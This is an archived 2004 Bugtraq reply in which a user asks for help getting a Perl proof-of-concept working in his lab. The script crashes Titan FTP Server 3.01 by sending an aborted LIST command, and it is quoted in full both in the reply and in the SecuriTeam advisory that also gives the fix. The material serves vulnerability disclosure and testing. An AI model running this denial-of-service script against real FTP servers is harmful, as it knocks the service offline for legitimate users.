lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 06 May 2004 19:19:59 -0700 From: Gene Ken <gken@....sina.com> To: Aviram Jenik <aviram@...ondsecurity.com> Cc: bugtraq@...urityfocus.com Subject: Re: Titan FTP Server Aborted LIST DoS Hi Aviram, I have some trouble with the testing of current exploit, the below is my tested procedure: 1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2 (english, 5.1 build 2600), and the client side is redhat linux 9 using NAT in Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3. 2) I have successfully Titan Ftp Server v3.01 Build 163 installed on Winxp Pro platform. also the perl script u mentioned in ur article has successfully executed like as the below: /* on my redhat box, i use ftp to verify if the titan ftp server is running, the result is the info as below: */ [gken@rh9 gken]$ ftp 192.168.0.2 Connected to 192.168.0.2 (192.168.0.2). 220 Titan FTP Server 3.01.163 Ready. Name (192.168.0.2:gken): gken 331 User name okay, need password. Password: 230-Welcome gken from 192.168.0.2. You are now logged in to the server. 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. /* executing titan.pl script */ [gken@rh9 gken]$ perl titan.pl Combination: cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22. how to tackle this? thx in advance! ---the titan.pl--- #!/usr/bin/perl # Test for Titan FTP server security vulnerability # # Orkut users? Come join the SecuriTeam community # http://www.orkut.com/Community.aspx?cmm=44441 # use IO::Socket; $host = "192.168.0.2"; my @combination; $combination[0] = "LIST \r\n"; for (my $i = 0; $combination[$i] ; $i++) { print "Combination: $1\n"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2112", ); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/331 /) { last; } } $ftp = "PASS a\@b.com\r\n"; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/230 /) { last; } } $ftp = $combination[$i]; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/150 /) { last; } close $remote; } } At 05:51 AM 5/5/2004, you wrote: > Titan FTP Server Aborted LIST DoS >---------------------------------------------------- > > >Article reference: >http://www.securiteam.com/windowsntfocus/5RP0215CUU.html > > >SUMMARY > >A security vulnerability exists in South River Technologies' Titan FTP >Server. >An attacker issuing a LIST command and disconnecting before the LIST command >had the time to connect, will cause the program to try and access an invalid >socket. This will result in the FTP service's crash (and in turn, no longer >being able to service any additional users). > > >DETAILS > >Vulnerable Systems: > * Titan FTP Server version 3.01 build 163 > > Immune Systems: > * Titan FTP Server version 3.10 build 169 > > Solution: > To solve this issue upgrade to the latest version (3.10 build 169 or newer). > > Exploit: > #!/usr/bin/perl > # Test for Titan FTP server security vulnerability > # > # Orkut users? Come join the SecuriTeam community > # http://www.orkut.com/Community.aspx?cmm=44441 > # > use IO::Socket; > > $host = "192.168.1.243"; > > my @combination; > $combination[0] = "LIST \r\n"; > > for (my $i = 0; $combination[$i] ; $i++) > { > print "Combination: $1\n"; > > $remote = IO::Socket::INET->new ( Proto => "tcp", > PeerAddr => $host, > PeerPort => "2112", > ); > unless ($remote) { die "cannot connect to ftp daemon on $host" } > > print "connected\n"; > while (<$remote>) > { > print $_; > if (/220 /) > { > last; > } > } > > $remote->autoflush(1); > > my $ftp = "USER anonymous\r\n"; > > print $remote $ftp; > print $ftp; > > while (<$remote>) > { > print $_; > if (/331 /) > { > last; > } > } > > $ftp = "PASS a\@b.com\r\n"; > print $remote $ftp; > print $ftp; > > while (<$remote>) > { > print $_; > if (/230 /) > { > last; > } > } > > $ftp = $combination[$i]; > > print $remote $ftp; > print $ftp; > > while (<$remote>) > { > print $_; > if (/150 /) > { > last; > } > > > close $remote; > } > > >ADDITIONAL INFORMATION > >SecurITeam would like to thank <mailto:storm@...uriteam.com> STORM for >finding this vulnerability. > > > > >Regards, >Aviram Jenik >Beyond Security Ltd. > >http://www.BeyondSecurity.com >http://www.SecuriTeam.com > >The First Integrated Network and Web Application Vulnerability Scanner: >http://www.beyondsecurity.com/webscan-wp.pdf > > > > >==================== >==================== > >DISCLAIMER: >The information in this bulletin is provided "AS IS" without warranty of any >kind. >In no event shall we be liable for any damages whatsoever including direct, >indirect, incidental, consequential, loss of business profits or special >damages. Regards, Gene Ken 86-10-62928315 (Home) 86-13901016339 (Cell) /* Out of intense complexities, emerge intense simplicities. */
Powered by blists - more mailing lists